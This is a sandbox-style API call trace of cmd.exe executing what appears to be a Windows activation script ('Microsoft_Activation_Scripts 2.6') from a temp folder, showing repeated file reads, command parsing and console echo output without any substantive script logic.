[0180.738] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb980 [0180.738] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0180.738] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.739] GetFileType (hFile=0x24) returned 0x2 [0180.739] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.739] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.740] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.740] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0180.741] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.741] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.741] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.741] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.742] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.742] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.742] SetConsoleInputExeNameW () returned 0x1 [0180.742] GetConsoleOutputCP () returned 0x1b5 [0180.742] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.742] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.743] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.743] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.743] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.743] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9220, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2404 [0180.743] GetProcessHeap () returned 0x19a8f1e0000 [0180.743] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0180.743] GetProcessHeap () returned 0x19a8f1e0000 [0180.743] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0180.743] GetProcessHeap () returned 0x19a8f1e0000 [0180.743] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0180.743] GetProcessHeap () returned 0x19a8f1e0000 [0180.743] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.743] GetProcessHeap () returned 0x19a8f1e0000 [0180.744] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0180.745] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.745] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2404 [0180.745] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.745] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9227, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x240b [0180.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n, 30\r\noft_Activation_Scripts %masver%\r\n============================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0180.745] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.745] GetFileType (hFile=0xa0) returned 0x1 [0180.745] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.745] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x240b [0180.745] GetProcessHeap () returned 0x19a8f1e0000 [0180.745] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.746] GetProcessHeap () returned 0x19a8f1e0000 [0180.746] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.747] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.747] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.747] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.747] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.747] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.747] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.747] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.747] GetProcessHeap () returned 0x19a8f1e0000 [0180.747] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0180.747] GetProcessHeap () returned 0x19a8f1e0000 [0180.747] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.747] _tell (_FileHandle=3) returned 9227 [0180.747] _close (_FileHandle=3) returned 0 [0180.747] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.747] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.747] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.747] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.747] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.747] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.747] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.748] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.748] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.748] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.748] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.748] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.748] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.748] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.748] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.748] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.748] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.748] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.748] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.748] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.748] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.748] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.748] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.748] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.748] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.748] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.748] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.748] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.748] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.748] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.748] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.748] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.748] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.748] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.748] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.748] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.748] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.748] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.748] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.749] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.749] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.749] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.749] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.749] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.749] GetLastError () returned 0x7b [0180.749] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.749] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.749] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.749] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.749] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.750] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.750] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.750] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.750] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.750] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.750] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.750] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.750] GetProcessHeap () returned 0x19a8f1e0000 [0180.750] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0180.750] GetProcessHeap () returned 0x19a8f1e0000 [0180.750] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec680 [0180.750] GetProcessHeap () returned 0x19a8f1e0000 [0180.750] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec680, Size=0x16) returned 0x19a8f1ec6e0 [0180.750] GetProcessHeap () returned 0x19a8f1e0000 [0180.750] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec6e0) returned 0x16 [0180.750] GetProcessHeap () returned 0x19a8f1e0000 [0180.750] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb6e0 [0180.750] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0180.750] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.750] GetFileType (hFile=0x24) returned 0x2 [0180.750] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.750] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.751] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.751] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0180.751] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.751] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.752] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.752] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.752] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.752] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.752] SetConsoleInputExeNameW () returned 0x1 [0180.752] GetConsoleOutputCP () returned 0x1b5 [0180.753] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.753] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.753] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.753] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.753] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.753] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9227, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x240b [0180.754] GetProcessHeap () returned 0x19a8f1e0000 [0180.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.754] GetProcessHeap () returned 0x19a8f1e0000 [0180.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6e0) returned 1 [0180.754] GetProcessHeap () returned 0x19a8f1e0000 [0180.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0180.754] GetProcessHeap () returned 0x19a8f1e0000 [0180.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.754] GetProcessHeap () returned 0x19a8f1e0000 [0180.756] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0180.756] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.756] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x240b [0180.756] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.756] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9234, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2412 [0180.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n, 30\r\noft_Activation_Scripts %masver%\r\n============================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0180.756] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.756] GetFileType (hFile=0xa0) returned 0x1 [0180.756] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.756] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2412 [0180.756] GetProcessHeap () returned 0x19a8f1e0000 [0180.756] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.757] GetProcessHeap () returned 0x19a8f1e0000 [0180.758] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.759] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.759] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.759] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.760] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.760] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.760] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.760] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.760] GetProcessHeap () returned 0x19a8f1e0000 [0180.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0180.760] GetProcessHeap () returned 0x19a8f1e0000 [0180.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb950 [0180.760] _tell (_FileHandle=3) returned 9234 [0180.761] _close (_FileHandle=3) returned 0 [0180.761] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.761] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.761] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.761] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.761] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.762] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.762] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.762] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.762] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.762] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.762] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.762] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.762] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.762] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.762] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.763] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.763] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.763] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.763] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.763] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.763] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.763] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.763] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.763] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.764] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.764] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.764] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.764] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.764] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.764] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.764] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.764] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.764] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.765] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.765] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.765] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.765] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.765] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.765] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.765] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.765] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.765] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.766] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.766] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.766] GetLastError () returned 0x7b [0180.767] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.767] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.767] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.767] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.767] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.768] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.768] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.768] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.768] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.768] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.768] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.768] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.768] GetProcessHeap () returned 0x19a8f1e0000 [0180.768] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0180.768] GetProcessHeap () returned 0x19a8f1e0000 [0180.768] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec800 [0180.768] GetProcessHeap () returned 0x19a8f1e0000 [0180.768] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec800, Size=0x16) returned 0x19a8f1ecae0 [0180.768] GetProcessHeap () returned 0x19a8f1e0000 [0180.768] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ecae0) returned 0x16 [0180.768] GetProcessHeap () returned 0x19a8f1e0000 [0180.768] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb8f0 [0180.768] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0180.768] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.768] GetFileType (hFile=0x24) returned 0x2 [0180.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.769] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.769] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.769] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0180.769] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.769] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.770] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.770] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.770] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.770] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.770] SetConsoleInputExeNameW () returned 0x1 [0180.770] GetConsoleOutputCP () returned 0x1b5 [0180.771] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.771] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.771] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.771] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.771] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.771] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9234, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2412 [0180.771] GetProcessHeap () returned 0x19a8f1e0000 [0180.771] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.771] GetProcessHeap () returned 0x19a8f1e0000 [0180.771] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecae0) returned 1 [0180.771] GetProcessHeap () returned 0x19a8f1e0000 [0180.771] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.771] GetProcessHeap () returned 0x19a8f1e0000 [0180.771] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0180.771] GetProcessHeap () returned 0x19a8f1e0000 [0180.773] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0180.773] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.773] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2412 [0180.773] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.773] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9310, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x245e [0180.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: ______________________________________________________________\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 76 [0180.773] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.773] GetFileType (hFile=0xa0) returned 0x1 [0180.773] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.773] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x245e [0180.773] GetProcessHeap () returned 0x19a8f1e0000 [0180.773] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.774] GetProcessHeap () returned 0x19a8f1e0000 [0180.775] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.776] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.776] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.776] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.776] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.776] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.776] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.776] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.776] GetProcessHeap () returned 0x19a8f1e0000 [0180.776] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0180.776] GetProcessHeap () returned 0x19a8f1e0000 [0180.776] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.777] GetProcessHeap () returned 0x19a8f1e0000 [0180.777] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f200710 [0180.777] _tell (_FileHandle=3) returned 9310 [0180.777] _close (_FileHandle=3) returned 0 [0180.777] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.777] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.777] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.777] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.777] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.777] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.777] _wcsicmp 